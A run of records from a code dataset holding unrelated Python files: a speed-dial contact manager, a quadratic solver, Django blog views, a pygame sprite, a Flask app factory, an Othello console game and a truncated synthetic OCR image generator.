speed_dial}\t\t\n\n\t\tself.execute_query('contactmanager', sql, params)\n\n\tdef query_speed_dial(self, username, speed_dial):\n\t\tsql = \"\"\"\n\t\t\tselect ctn.display_number, sd.contact_telephone_number_id, sd.speed_dial_number\n\t\t\tfrom contact_owners co, contacts c, contact_telephone_numbers ctn, speed_dials sd\n\t\t\twhere sd.contact_telephone_number_id = ctn.id\n\t\t\tand co.username = %(username)s\n\t\t\tand c.contact_owner_id = co.id\n\t\t\tand ctn.contact_id = c.id\n\t\t\tand sd.contact_owner_id = co.id\n\t\t\tand sd.speed_dial_number = %(speed_dial)s\n\t\t\"\"\"\n\t\tparams = {'username': username.lower(), 'speed_dial': speed_dial}\n\n\t\tcurs = self.execute_query('contactmanager', sql, params)\n\t\trows = curs.fetchall()\n\n\t\tif len(rows) > 0:\n\t\t\tif len(rows) > 1:\n\t\t\t\tself.log.warn(\"Found more than one speed dial did for username: \" + username + \" and speed dial \" + speed_dial)\n\t\t\trow = rows[0]\n\t\t\tsd_info = ReturnObject()\n\t\t\tsd_info.speed_dial_did = phone_format.format_phone(row[0])\n\t\t\tsd_info.contact_telephone_number_id = row[1]\n\t\t\tsd_info.speed_dial_number = row[2]\n\n\t\t\treturn sd_info\n\t\telse:\n\t\t\tself.log.debug(\"No speed dial found for username: \" + username + \" and speed dial \" + speed_dial)\n\t\t\treturn None\n\n\tdef get_summary(self, username):\n\t\t\"\"\"returns all the speed dial number mappings for the given username\"\"\"\n\t\tsql = \"\"\"\n\t\t\tselect ctn.display_number, sd.contact_telephone_number_id, sd.speed_dial_number\n\t\t\tfrom contact_owners co, contacts c, contact_telephone_numbers ctn, speed_dials sd\n\t\t\twhere sd.contact_telephone_number_id = ctn.id\n\t\t\tand co.username = %(username)s\n\t\t\tand c.contact_owner_id = co.id\n\t\t\tand ctn.contact_id = c.id\n\t\t\tand sd.contact_owner_id = co.id\n\t\t\"\"\"\n\n\t\tparams = {'username': username.lower()}\n\n\t\tcurs = self.execute_query('contactmanager', sql, params)\n\t\trows = curs.fetchall()\n\n\t\tobj = SpeedDialSummary()\n\n\t\tif rows is None:\n\t\t\treturn obj\n\n\t\tfor row in rows:\n\t\t\tsd_info = ReturnObject()\n\t\t\tsd_info.speed_dial_did = phone_format.format_phone(row[0])\n\t\t\tsd_info.contact_telephone_number_id = row[1]\n\t\t\tsd_info.speed_dial_number = row[2]\n\t\t\tobj.speed_dial.append(sd_info)\n\t\t\n\t\treturn obj\n\n\tdef scrub_speed_dial(self, speed_dial):\n\n\t\t# just use the last 3 digits\n\t\treturn speed_dial[-3:]\n\n\t#######################\n\t### BEGIN DELETE ME ###\n\t#######################\n\n\tdef legacy_query_speed_dial(self, username, speed_dial):\n\t\tsql = \"\"\"\n\t\t\tselect ctn.display_number, ctns.contact_telephone_number_id, ctns.setting_data as speed_dial_number\n\t\t\tfrom contact_telephone_number_settings ctns, contact_telephone_numbers ctn, contacts c, contact_owners co\n\t\t\twhere ctns.setting_type = 'speed_dial'\n\t\t\tand ctn.id = ctns.contact_telephone_number_id\n\t\t\tand c.id = ctn.contact_id\n\t\t\tand co.id = c.contact_owner_id\n\t\t\tand lower(co.username) = %(username)s\n\t\t\tand ctns.setting_data = %(speed_dial)s\n\t\t\"\"\"\n\t\tparams = {'username': username, 'speed_dial': speed_dial}\n\n\t\tcurs = self.execute_query('contactmanager', sql, params)\n\t\trows = curs.fetchall()\n\n\t\tif len(rows) > 0:\n\t\t\tif len(rows) > 1:\n\t\t\t\tself.log.warn(\"LEGACY: Found more than one speed dial did for username: \" + username + \" and speed dial \" + speed_dial)\n\n\t\t\trow = rows[0]\n\t\t\tsd_info = ReturnObject()\n\t\t\tsd_info.speed_dial_did = phone_format.format_phone(row[0])\n\t\t\tsd_info.contact_telephone_number_id = row[1]\n\t\t\tsd_info.speed_dial_number = row[2]\n\t\t\treturn sd_info\n\n\t\telse:\n\t\t\tself.log.debug(\"LEGACY: No speed dial found for username: \" + username + \" and speed dial \" + speed_dial)\n\t\t\treturn None\n\n\tdef legacy_get_summary(self, username):\n\t\tsql = \"\"\"\n\t\t\tselect ctn.display_number, ctns.contact_telephone_number_id, ctns.setting_data as speed_dial_number\n\t\t\tfrom contact_telephone_number_settings ctns, contact_telephone_numbers ctn, contacts c, contact_owners co\n\t\t\twhere ctns.setting_type = 'speed_dial'\n\t\t\tand ctn.id = ctns.contact_telephone_number_id\n\t\t\tand c.id = ctn.contact_id\n\t\t\tand co.id = c.contact_owner_id\n\t\t\tand lower(co.username) = %(username)s\n\t\t\"\"\"\n\t\tparams = {'username': username.lower()}\n\n\t\tcurs = self.execute_query('contactmanager', sql, params)\n\t\trows = curs.fetchall()\n\n\t\tobj = SpeedDialSummary()\n\n\t\tif rows is None:\n\t\t\treturn obj\n\n\t\tfor row in rows:\n\t\t\tsd_info = ReturnObject()\n\t\t\tsd_info.speed_dial_did = phone_format.format_phone(row[0])\n\t\t\tsd_info.contact_telephone_number_id = row[1]\n\t\t\tsd_info.speed_dial_number = row[2]\n\t\t\tobj.speed_dial.append(sd_info)\n\n\t\treturn obj\n\n\tdef merge_results(self, current_obj, legacy_obj):\n\t\tobj = SpeedDialSummary()\n\n\t\tif current_obj is not None and current_obj.speed_dial is not None:\n\t\t\tfor sd_info in current_obj.speed_dial:\n\t\t\t\tobj.speed_dial.append(sd_info)\n\n\t\tif legacy_obj is not None and legacy_obj.speed_dial is not None:\n\t\t\tfor sd_info in legacy_obj.speed_dial:\n\t\t\t\tif not self.in_speed_dial_list(sd_info, obj.speed_dial):\n\t\t\t\t\tobj.speed_dial.append(sd_info)\n\n\t\treturn obj\n\n\tdef in_speed_dial_list(self, sd_item, speed_dials):\n\t\tfor speed_dial in speed_dials:\n\t\t\tif str(speed_dial.speed_dial_number) != str(sd_item.speed_dial_number):\n\t\t\t\tcontinue\n\t\t\tif str(speed_dial.speed_dial_did) != str(sd_item.speed_dial_did):\n\t\t\t\tcontinue\n\t\t\tif str(speed_dial.contact_telephone_number_id) != str(sd_item.contact_telephone_number_id):\n\t\t\t\tcontinue\n\t\t\treturn True\n\n\t\treturn False\n\n\t#####################\n\t### END DELETE ME ###\n\t#####################\n\n\tdef routes(self, map, key):\n\n\t\tname = \"speed_dial\"\n\t\troute = \"/dispatcher/%s\" % (name)\n\t\tself.log.debug(\"Adding route \" + str(route) + \" for \" + str(key))\n\t\tmap.connect(route, controller=key)\n\n\t\troute = \"/contact_manager/%s\" % (name)\n\t\tself.log.debug(\"Adding route \" + str(route) + \" for \" + str(key))\n\t\tmap.connect(route, controller=key)\n\n","sub_path":"contact_manager/speed_dial.py","file_name":"speed_dial.py","file_ext":"py","file_size_in_byte":14674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"179421662","text":"import math \n \n \n# function for finding roots \ndef equationroots( a, b, c): \n \n # calculating discriminant using formula \n dis = b * b - 4 * a * c \n sqrt_val = math.sqrt(abs(dis)) \n \n # checking condition for discriminant \n if dis > 0: \n print(\"x1 = \", (-b + sqrt_val)/(2 * a), \", x2 = \",(-b - sqrt_val)/(2 * a)) \n \n elif dis == 0: \n print(\"x = \",-b / (2 * a)) \n \n # when discriminant is less than 0 \n else: \n print(\"NaN\") \n \n\n\ndef Discro(A):\n if len(A) == 3:\n x = A[0]\n y = A[1]\n z = A[2]\n equationroots(x, y, z)\n #return d\n elif len(A) == 6:\n B = A[:len(A)//2]\n #print(B)\n x = B[0]\n y = B[1]\n z = B[2]\n equationroots(x, y, z)\n \n C = A[len(A)//2:]\n print(C)\n x = C[0]\n y = C[1]\n z = C[2]\n equationroots(x, y, z)\n \n #return d1, d2\n \n else:\n print(\"Erreur, Pas de calcul de discriminant\")\n\nif __name__ == '__main__':\n #main()\n SK = [1, -5, 6, 1, 2, 1]\n Discro(SK)\n\n\n\n\n\n\n\n\n\n\n \n","sub_path":"EXO/Discriminant.py","file_name":"Discriminant.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"13101505","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\n\nfrom django_blog.core.forms import PostForm\nfrom django_blog.core.models import Post\n\n\ndef home(request):\n posts = Post.objects.order_by('published_date')\n return render(request, 'index.html', {'posts': posts})\n\n\ndef post_detail(request, pk):\n posts = get_object_or_404(Post, pk=pk)\n return render(request, 'detail_post.html', {'post': posts})\n\n\ndef post_new(request):\n if request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n form.full_clean()\n new_post = Post.objects.create(author=request.user)\n post = PostForm(request.POST, instance=new_post)\n post.save()\n return redirect('/')\n else:\n form = PostForm()\n return render(request, 'post_new.html', {'form': form})\n\n\ndef post_edit(request, pk):\n post = get_object_or_404(Post, pk=pk)\n if request.method == 'POST':\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n form.full_clean()\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('/post/' + str(pk) + '/')\n else:\n form = PostForm(instance=post)\n return render(request, 'post_new.html', {'form': form})\n","sub_path":"django_blog/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"491875705","text":"# 题目:请实现一个函数,用来找出字符流中第一个只出现一次的字符。\n# 例如,当从字符流中只读出前两个字符\"go\"时,第一个只出现一次的字符是\"g\";\n# 当从 该字符流中读出前6个字符\"google\"时,第一个只出现一次的字符是\"l\"。\n\n\nclass Solution(object):\n # 返回对应char\n def __init__(self):\n self.s = ''\n self.dic = {}\n\n def FirstAppearingOnce(self):\n # write code here\n for i in self.s:\n if self.dic[i] == 1:\n return i\n return '#'\n\n def Insert(self, char):\n # write code here\n self.s += char\n if char not in self.dic:\n self.dic[char] = 1\n else:\n self.dic[char] += 1\n","sub_path":"50_02字符流中第一个只出现依次的字符.py","file_name":"50_02字符流中第一个只出现依次的字符.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"43450115","text":"# Copyright 2018 Jiří Janoušek \n# Licensed under BSD-2-Clause license - see file LICENSE for details.\n\nfrom typing import Optional\n\nfrom PIL import Image\nfrom resizeimage import resizeimage\n\n\ndef create_thumbnail(input_file: str, output_file: str, width: Optional[int], height: Optional[int]) -> None:\n with open(input_file, 'rb') as fh:\n img = Image.open(fh)\n if width and height:\n img = resizeimage.resize_thumbnail(img, [width, height])\n elif width:\n img = resizeimage.resize_width(img, width)\n elif height:\n img = resizeimage.resize_height(img, height)\n else:\n raise ValueError('Width or height must be specified.')\n img.save(output_file)\n","sub_path":"fxwebgen/imaging.py","file_name":"imaging.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"210155190","text":"\nimport pandas as pd\nimport numpy as np\nimport os\n\n# ---------------------------------------------------------------------\n# Homework 4: see hw/hw02/hw02.ipynb for question prompt\n# ---------------------------------------------------------------------\n\n\ndef join_purch_visit(purch, webvisits):\n \"\"\"\n approximately joins the purchases and webvisits data according\n to the condition specified in the HW.\n\n :Example:\n >>> fpurch = os.path.join('data', 'hw04', 'purch.csv')\n >>> fweb = os.path.join('data', 'hw04', 'webvisits.csv')\n >>> purch, webvisits = pd.read_csv(fpurch), pd.read_csv(fweb)\n >>> joined = join_purch_visit(purch, webvisits)\n >>> joined['email'].nunique() == len(joined)\n True\n \"\"\"\n return ...\n\n\ndef revenue_by_url(joined):\n \"\"\"\n Returns the revenue of each ad-campaign (web visit)\n\n :Example:\n >>> fpurch = os.path.join('data', 'hw04', 'purch.csv')\n >>> fweb = os.path.join('data', 'hw04', 'webvisits.csv')\n >>> purch, webvisits = pd.read_csv(fpurch), pd.read_csv(fweb)\n >>> joined = join_purch_visit(purch, webvisits)\n >>> out = revenue_by_url(joined)\n >>> isinstance(out, pd.Series)\n True\n >>> isinstance(out.iloc[0], float)\n True\n \"\"\"\n\n return ...\n\n# ---------------------------------------------------------------------\n# DO NOT TOUCH BELOW THIS LINE\n# IT'S FOR YOUR OWN BENEFIT!\n# ---------------------------------------------------------------------\n\n\n# Graded functions names! DO NOT CHANGE!\n# This dictionary provides your doctests with\n# a check that all of the questions being graded\n# exist in your code!\n\nGRADED_FUNCTIONS = {\n 'q01': ['join_purch_visit', 'revenue_by_url']\n}\n\n\ndef check_for_graded_elements():\n \"\"\"\n >>> check_for_graded_elements()\n True\n \"\"\"\n \n for q, elts in GRADED_FUNCTIONS.items():\n for elt in elts:\n if elt not in globals():\n stmt = \"YOU CHANGED A QUESTION THAT SHOULDN'T CHANGE! \\\n In %s, part %s is missing\" %(q, elt)\n raise Exception(stmt)\n\n return True\n\n","sub_path":"extra-credit/ec_hw04.py","file_name":"ec_hw04.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"495419556","text":"# -*- coding: utf-8 -*-\nfrom PIL import Image\nimage = Image.open('img/lwt.jpg')\n\ndef binarize_image(image):\n pixels = image.load()\n # image.show()\n for x in range(image.width):\n for y in range(image.height):\n if pixels[x,y][0] < 20 or pixels[x,y] < 20 or pixels[x,y][2] < 20:\n pixels[x,y] = (0,0,0,225)\n else:\n pixels[x,y] = (225,225,225,225)\n return image\n\n# binarize_image(image).show()\n","sub_path":"pic_proc.py","file_name":"pic_proc.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"153069395","text":"import pygame\nimport random\n\nfrom pygame.locals import (\n RLEACCEL,\n)\nfrom invasion.settings import Settings\n\n\nclass Terminator(pygame.sprite.Sprite):\n \"\"\"\n Define the cloud object extending pygame.sprite.Sprite\n Use an image for a better looking sprite\n \"\"\"\n\n def __init__(self):\n super(Terminator, self).__init__()\n self.settings = Settings()\n self.surf = pygame.image.load(self.settings.IMG_TERMINATOR).convert_alpha()\n #self.surf.set_colorkey((0,0,0), RLEACCEL)\n # The starting position is randomly generated\n x = random.randint(int(self.settings.SCREEN_WIDTH/4) + 20, self.settings.SCREEN_WIDTH + 100)\n y = random.randint(0, self.settings.SCREEN_HEIGHT)\n self.rect = self.surf.get_rect(\n center=(x, y)\n )\n\n\n def update(self):\n \"\"\"\n Move the ship based on a constant speed\n Remove it when it passes the left edge of the screen\n \"\"\"\n self.rect.move_ip(-5, 0)\n if self.rect.right < 0:\n self.kill()\n\n","sub_path":"invasion/terminator.py","file_name":"terminator.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"367460957","text":"# -*- coding: UTF-8 -*-\r\nfrom flask import Flask\r\nfrom config import load_config\r\n\r\nimport os\r\nfrom .extensions import db, api_ins, bootstrap, mail, moment, \\\r\n login_manager, admin, pagedown, db_mongo, ListConverter\r\n\r\n\r\ndef create_app(config=None):\r\n app = Flask(__name__)\r\n config = load_config(config)\r\n app.config.from_object(config)\r\n config.init_app(app)\r\n\r\n os.makedirs(app.config['REPO_DIR'], exist_ok=True)\r\n os.makedirs(app.config['REPO_CLONE_DIR'], exist_ok=True)\r\n\r\n bootstrap.init_app(app)\r\n mail.init_app(app)\r\n moment.init_app(app)\r\n db.init_app(app)\r\n login_manager.init_app(app)\r\n pagedown.init_app(app)\r\n admin.init_app(app)\r\n db_mongo.init_app(app)\r\n\r\n app.url_map.converters['list'] = ListConverter\r\n\r\n from .main import main as main_blueprint\r\n app.register_blueprint(main_blueprint)\r\n\r\n from .auth import auth as auth_blueprint\r\n app.register_blueprint(auth_blueprint, url_prefix='/auth')\r\n\r\n from .api import api as api_blueprint\r\n app.register_blueprint(api_blueprint, url_prefix='/api/v1')\r\n\r\n from .analytics import analyze as analytics_blueprint\r\n app.register_blueprint(analytics_blueprint, url_prefix='/analytics')\r\n\r\n from .gitserver import gitserver as gitserver_blueprint\r\n app.register_blueprint(gitserver_blueprint)\r\n\r\n api_ins.init_app(app)\r\n\r\n return app\r\n","sub_path":"leiter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"348212671","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport math\nimport re\n\ndirections = (\n\t\t(-1, -1), (-1, 0), (-1, +1),\n\t\t( 0, -1), ( 0, +1),\n\t\t(+1, -1), (+1, 0), (+1, +1),\n)\n\n\nclass State(object):\n\tdef __init__(self):\n\t\tself.kernel = [0] * 64\n\t\tself.kernel[State.rc2pos(3, 3)] = +1\n\t\tself.kernel[State.rc2pos(3, 4)] = -1\n\t\tself.kernel[State.rc2pos(4, 3)] = -1\n\t\tself.kernel[State.rc2pos(4, 4)] = +1\n\t\tself.update_moves()\n\n\tdef get_standing(self):\n\t\treturn sum(self.kernel)\n\n\t@staticmethod\n\tdef adjacent_pos(pos, r_delta, c_delta):\n\t\tr, c = State.pos2rc(pos)\n\n\t\tr += r_delta\n\t\tc += c_delta\n\n\t\treturn State.rc2pos(r, c)\n\n\t@staticmethod\n\tdef adjacents(pos, r_delta, c_delta):\n\t\twhile True:\n\t\t\tpos = State.adjacent_pos(pos, r_delta, c_delta)\n\t\t\tif pos is None:\n\t\t\t\treturn\n\t\t\tyield pos\n\n\t@staticmethod\n\tdef pos2rc(pos):\n\t\treturn (int(pos / 8), int(pos % 8))\n\n\t@staticmethod\n\tdef rc2pos(r, c):\n\t\tif r < 0 or r >= 8:\n\t\t\treturn None\n\t\tif c < 0 or c >= 8:\n\t\t\treturn None\n\t\treturn int(r * 8 + c)\n\n\tdef get_pos_value(self, pos):\n\t\treturn self.kernel[pos]\n\n\tdef find_non_value(self, pos, value, direction):\n\t\tfor pos in State.adjacents(pos, *direction):\n\t\t\tif self.get_pos_value(pos) != value:\n\t\t\t\treturn pos\n\t\treturn None\n\n\tdef find_pair_pos(self, pos, colour, direction, occupied):\n\t\tadjacent = self.adjacent_pos(pos, *direction)\n\t\tif self.get_pos_value(adjacent) != -colour:\n\t\t\treturn None\n\t\tcandidate = self.find_non_value(adjacent, -colour, direction)\n\t\tif candidate is None:\n\t\t\treturn None\n\t\tif self.get_pos_value(candidate) != (colour if occupied else 0):\n\t\t\treturn None\n\t\treturn candidate\n\n\n\tdef possible_moves(self, for_v):\n\t\tmoves = set()\n\t\tfor pos in range(64):\n\t\t\tif self.kernel[pos] == for_v:\n\t\t\t\tfor direction in directions:\n\t\t\t\t\tcandidate = self.find_pair_pos(pos, for_v, direction, False)\n\t\t\t\t\tif candidate is not None:\n\t\t\t\t\t\tmoves.add(candidate)\n\t\treturn moves\n\n\tdef update_colours(self, origin):\n\t\tcolour = self.get_pos_value(origin)\n\t\tfor direction in directions:\n\t\t\tpair = self.find_pair_pos(origin, colour, direction, True)\n\t\t\tif pair is None:\n\t\t\t\tcontinue\n\t\t\tfor adjacent in State.adjacents(origin, *direction):\n\t\t\t\tif adjacent == pair:\n\t\t\t\t\tbreak\n\t\t\t\tself.kernel[adjacent] = colour\n\n\tdef update_moves(self):\n\t\tself.black_moves = self.possible_moves(+1)\n\t\tself.white_moves = self.possible_moves(-1)\n\n\tdef get_moves(self, for_v):\n\t\tif for_v == +1:\n\t\t\treturn self.black_moves\n\t\tif for_v == -1:\n\t\t\treturn self.white_moves\n\t\traise \"unsupported\"\n\n\n\tdef mutate(self, r, c, for_v):\n\t\tpos = State.rc2pos(r, c)\n\t\tif pos is None:\n\t\t\traise RuntimeError(\"bad pos\")\n\t\tif pos not in self.get_moves(for_v):\n\t\t\traise RuntimeError(\"bad move\")\n\n\t\tself.kernel[pos] = for_v\n\t\tself.update_colours(pos)\n\t\tself.update_moves()\n\n\t@staticmethod\n\tdef v2xo(v):\n\t\tif v == +1:\n\t\t\treturn 'x'\n\t\tif v == -1:\n\t\t\treturn 'o'\n\t\treturn None\n\n\tdef print(self, f):\n\t\tf.write(' |')\n\t\tfor c in range(8):\n\t\t\tf.write('%s|' % chr(ord('a') + c))\n\t\tf.write('\\n')\n\t\tfor r in range(8):\n\t\t\tf.write('%s|' % chr(ord('1') + r))\n\t\t\tfor c in range(8):\n\t\t\t\tv = self.get_pos_value(State.rc2pos(r, c))\n\t\t\t\txo = State.v2xo(v) if v else '_'\n\t\t\t\tf.write('%s|' % xo)\n\t\t\tf.write('\\n')\n\nstate = State()\n\nturn = +1\nwhile True:\n\ttry:\n\t\tstate.print(sys.stdout)\n\t\tsys.stdout.write('\\n')\n\n\t\tif not state.get_moves(turn):\n\t\t\tsys.stdout.write('%s passes\\n', State.v2xo(turn))\n\t\t\tturn = -turn\n\t\t\tif not state.get_moves(turn):\n\t\t\t\tsys.stdout.write('%s passes\\n', State.v2xo(turn))\n\t\t\t\tstanding = math.copysign(1, state.get_standing())\n\t\t\t\tif standing:\n\t\t\t\t\tsys.stdout.write('%s wins\\n', State.v2xo(standing))\n\t\t\t\telse:\n\t\t\t\t\tsys.stdout.write('it\\'s a draw\\n')\n\t\t\t\tbreak\n\n\t\twhile True:\n\t\t\trc = input(\"%s's turn to move: \" % State.v2xo(turn))\n\t\t\ttry:\n\t\t\t\tr = ord(next(re.finditer('[1-8]', rc)).group(0)) - ord('1')\n\t\t\t\tc = ord(next(re.finditer('[a-h]', rc)).group(0)) - ord('a')\n\t\t\t\tbreak\n\t\t\texcept StopIteration:\n\t\t\t\tpass\n\n\t\tstate.mutate(r, c, turn)\n\t\tturn = -turn\n\texcept RuntimeError as e:\n\t\tprint(e)\n\t\tsys.stdout.write('\\n')\n","sub_path":"othello.py","file_name":"othello.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"377346605","text":"from __future__ import print_function\nimport tensorflow as tf\nimport argparse\nfrom antk.core import config\nfrom antk.core import generic_model\nfrom antk.core import loader\nfrom antk.models import tree_model\n\ndef return_parser():\n parser = argparse.ArgumentParser(description=\"For testing\")\n parser.add_argument(\"datadir\", metavar=\"DATA_DIRECTORY\", type=str,\n help=\"The directory where train, dev, and test data resides. \")\n parser.add_argument(\"config\", metavar=\"CONFIG\", type=str,\n help=\"The config file for building the ant architecture.\")\n parser.add_argument(\"-initrange\", metavar=\"INITRANGE\", type=float, default=0.00001,\n help=\"A value determining the initial size of the weights.\")\n parser.add_argument(\"-kfactors\", metavar=\"KFACTORS\", type=int, default=20,\n help=\"The rank of the low rank factorization.\")\n parser.add_argument(\"-lamb\", metavar=\"LAMBDA\", type=float, default=0.01,\n help=\"The coefficient for l2 regularization\")\n parser.add_argument(\"-mb\", metavar=\"MINIBATCH\", type=int, default=500,\n help=\"The size of minibatches for stochastic gradient descent.\")\n parser.add_argument(\"-learnrate\", metavar=\"LEARNRATE\", type=float, default=0.00001,\n help=\"The stepsize for gradient descent.\")\n parser.add_argument(\"-verbose\", metavar=\"VERBOSE\", type=bool, default=True,\n help=\"Whether or not to print dev evaluations during training.\")\n parser.add_argument(\"-maxbadcount\", metavar=\"MAXBADCOUNT\", type=int, default=20,\n help=\"The threshold for early stopping.\")\n parser.add_argument(\"-epochs\", metavar=\"EPOCHS\", type=int, default=100,\n help=\"The maximum number of epochs to train for.\")\n parser.add_argument(\"-random_seed\", metavar=\"RANDOM_SEED\", type=int, default=500,\n help=\"For reproducible results.\")\n parser.add_argument(\"-eval_rate\", metavar=\"EVAL_RATE\", type=int, default=500,\n help=\"How often (in terms of number of data points) to evaluate on dev.\")\n return parser\n\nif __name__ == '__main__':\n\n args = return_parser().parse_args()\n\n data = loader.read_data_sets(args.datadir, folders=['train', 'test', 'dev', 'user', 'item'], mix=False)\n data.train.labels['ratings'] = loader.center(data.train.labels['ratings'], axis=None)\n data.dev.labels['ratings'] = loader.center(data.dev.labels['ratings'], axis=None)\n data.user.features['age'] = loader.center(data.user.features['age'], axis=None)\n data.item.features['year'] = loader.center(data.item.features['year'], axis=None)\n data.user.features['age'] = loader.maxnormalize(data.user.features['age'])\n data.item.features['year'] = loader.maxnormalize(data.item.features['year'])\n\n x = tree_model.tree(data, args.config,\n initrange=args.initrange,\n kfactors=args.kfactors,\n lamb =args.lamb,\n mb=args.mb,\n learnrate=args.learnrate,\n verbose=args.verbose,\n maxbadcount=args.maxbadcount,\n epochs=args.epochs,\n random_seed=args.random_seed,\n eval_rate=args.eval_rate)\n #print stuff here to file.\n","sub_path":"test/modelwrappers/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"297832717","text":"import matplotlib.pyplot as plt\nimport cv2\nimport os\nimport random\nimport math\nimport shutil\nimport numpy as np\nfrom xml.etree.ElementTree import Element, SubElement, ElementTree, dump\n\n'''\nInput:\n - character image files classified with different folders\n (ex: image files of phd08 dataset)\n - background image files\n (ex: DTD dataset, https://www.robots.ox.ac.uk/~vgg/data/dtd/)\n\nOutput:\n - synthetic images (character images patched on background images)\n - annotation (xml with labels, positions and sizes)\n - txt files (train / validation / test set splitted)\n\nUsage:\n 1) Download phd08 dataset (https://drive.google.com/drive/folders/0B-u3H0N7Z4OueFgtRDZCRmtmeFk)\n 2) Download background image dataset\n 3) Download phd08_to_image.py (https://gitlab2.kabang.io/bigdata/ocr/tree/master/preprocessing/phd08_to_tfrecord)\n 4) Run 'phd08_to_image.py' to convert txt files to image files => Output: phd08_out\n 5) Configure parameters of 'synthetic_text_image.py'\n 6) Run 'synthetic_text_image.py'\n'''\n\n# paramters\n# ---------------------------------------------------------------\n# character image files\nSOURCE_CHAR_DIR = \"/Users/asher/dev/workspace/exercise/phd08_to_tfrecord/phd08_out\"\nSOURCE_CHAR_FORMAT = '.jpeg'\n\n# background image files\nSOURCE_BG_DIR = \"/Users/asher/dev/workspace/exercise/cv/background\"\nSOURCE_BG_FORMAT = '.jpg'\n\n# target path/format\nTARGET_ROOT_DIR = \"synth_out\"\nTARGET_IMG_DIR = TARGET_ROOT_DIR + \"/images\"\nTARGET_ANNO_DIR = TARGET_ROOT_DIR + \"/annotation\"\nTARGET_FILE_FORMAT = '.jpg'\n\n# the number of output (synthetic images)\nNUMBER_OF_IMAGES = 100000\n\n# shuffle\nRANDOM_SEED = 12345\n\n# the range of the number of characters on each background image: (a, b) means a <= N <= b\nNUM_OF_CHARS_RANGE = (6, 10)\n\n# the range of font sizes: (a, b) means a <= N <= b\nFONT_SIZE_RANGE = (32, 64)\n\n# character patch threshold: larger 'a' means more vivid character images (a: 0~255)\nCHARS_THRESH = 127\n\n# splitting train/validation/test set (unit: %)\nTRAIN_SET = 98\nVALID_SET = 1\nTEST_SET = 1\n\n# display a synthesized image per 'N' numbers of samples\nDISPLAY_SAMPLE_PER_N = 1000\n# ---------------------------------------------------------------\n\n# if the target directory (for output) already exists, remove it\ntry:\n shutil.rmtree(TARGET_ROOT_DIR)\n shutil.rmtree(TARGET_IMG_DIR)\n shutil.rmtree(TARGET_ANNO_DIR)\nexcept OSError:\n pass\n\n# make a new target directory\nos.mkdir(TARGET_ROOT_DIR)\nos.mkdir(TARGET_IMG_DIR)\nos.mkdir(TARGET_ANNO_DIR)\n\n\ndef findImages(root_dir,\n file_format='.jpg'):\n filenames = []\n\n for (path, dirs, files) in os.walk(root_dir):\n fullpath = os.path.join(root_dir, path)\n for file in files:\n # get extension format of a file\n ext = os.path.splitext(file)[-1]\n if ext == file_format:\n filenames.append(os.path.join(fullpath, file))\n\n print(\"Found '{}' '{}' image files from the path: '{}'\\n\"\n .format(len(filenames), file_format, root_dir))\n\n return filenames\n\n\ndef shuffleFileLists(filenames,\n random_seed=RANDOM_SEED):\n shuffled_index = list(range(len(filenames)))\n random.seed(random_seed)\n random.shuffle(shuffled_index)\n shuffled_filenames = [filenames[i] for i in shuffled_index]\n\n return shuffled_filenames\n\n\ndef drawNonOverlappingImages(bg_file,\n char_files,\n num_of_chars_range=NUM_OF_CHARS_RANGE,\n font_size_range=FONT_SIZE_RANGE):\n def isOverlapped(prev_img, curr_img):\n # Input: (x, y, width, height)\n prev_center = (prev_img[0] + prev_img[2] / 2, prev_img[1] + prev_img[3] / 2)\n curr_center = (curr_img[0] + curr_img[2] / 2, curr_img[1] + curr_img[3] / 2)\n\n condition = (abs(prev_center[0] - curr_center[0]) > (prev_img[2] + curr_img[2]) / 2) | \\\n (abs(prev_center[1] - curr_center[1]) > (prev_img[3] + curr_img[3]) / 2)\n\n return not condition\n\n def patchImage(bg_img, char_img, pos_x, pos_y, font_size):\n\n char_img = cv2.resize(char_img, (font_size, font_size))\n roi = bg_img[pos_y:pos_y + font_size, pos_x:pos_x + font_size]\n\n char_img_gray = cv2.cvtColor(char_img, cv2.COLOR_BGR2GRAY)\n ret, mask = cv2.threshold(char_img_gray, CHARS_THRESH, 255, cv2.THRESH_BINARY_INV)\n mask_inv = cv2.bitwise_not(mask)\n\n bg_img_out = cv2.bitwise_and(roi, roi, mask=mask_inv)\n char_img_roi = cv2.bitwise_and(char_img, char_img, mask=mask)\n\n dst = cv2.add(bg_img_out, char_img_roi)\n bg_img[pos_y:pos_y + font_size, pos_x:pos_x + font_size] = dst\n\n return bg_img\n\n # read a background image file\n bg_img = cv2.imread(bg_file)\n bg_height, bg_width, bg_chn = bg_img.shape\n\n prev_images = [(0, 0, 0, 0)]\n\n for file in char_files:\n\n found_new_pos = False\n\n while not found_new_pos:\n font_size = random.randint(font_size_range[0], font_size_range[1])\n\n x = random.randint(0, 